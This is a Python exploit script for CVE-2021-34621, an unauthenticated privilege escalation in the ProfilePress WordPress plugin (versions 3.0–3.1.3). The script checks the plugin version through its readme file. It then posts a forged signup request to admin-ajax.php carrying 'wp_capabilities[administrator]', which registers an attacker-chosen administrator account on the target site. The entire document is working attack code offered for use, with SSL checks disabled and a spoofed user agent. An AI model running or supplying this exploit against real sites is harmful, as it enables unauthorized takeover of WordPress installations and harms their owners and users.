import argparse import re import requests import os # # Exploit script by @RandomRobbieBF # http_proxy = "" os.environ['HTTP_PROXY'] = http_proxy os.environ['HTTPS_PROXY'] = http_proxy # Ignore bad SSL and set proxy from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # Set a real user agent headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3' } def extract_stable_tag(wp_url): readme_url = wp_url + '/wp-content/plugins/wp-user-avatar/readme.txt' response = requests.get(readme_url, verify=False,headers=headers) if response.status_code == 200: readme_content = response.text stable_tag_match = re.search(r'Stable tag:\s*(\d+\.\d+\.\d+)', readme_content) if stable_tag_match: stable_tag = stable_tag_match.group(1) return stable_tag return None def main(): parser = argparse.ArgumentParser(description='CVE-2021-34621 - ProfilePress 3.0 - 3.1.3 - Unauthenticated Privilege Escalation') parser.add_argument('--url', required=True, help='WordPress URL') parser.add_argument('--username', required=True, help='Username') parser.add_argument('--email', required=True, help='Email') parser.add_argument('--password', required=True, help='Password') args = parser.parse_args() stable_tag = extract_stable_tag(args.url) if stable_tag and '3.0' <= stable_tag <= '3.1.3': payload = { 'reg_username': args.username, 'reg_email': args.email, 'reg_password': args.password, 'reg_password_present': 'true', 'reg_first_name': 'test', 'reg_last_name': 'test', 'wp_capabilities[administrator]': '1', 'action': 'pp_ajax_signup', 'melange_id': '' } response = requests.post(args.url + '/wp-admin/admin-ajax.php', data=payload, verify=False,headers=headers) if response.status_code == 200: print(response.text) else: print('Error:', response.status_code) else: print('Stable tag is not within the specified range (3.0 - 3.1.3)') if __name__ == '__main__': main()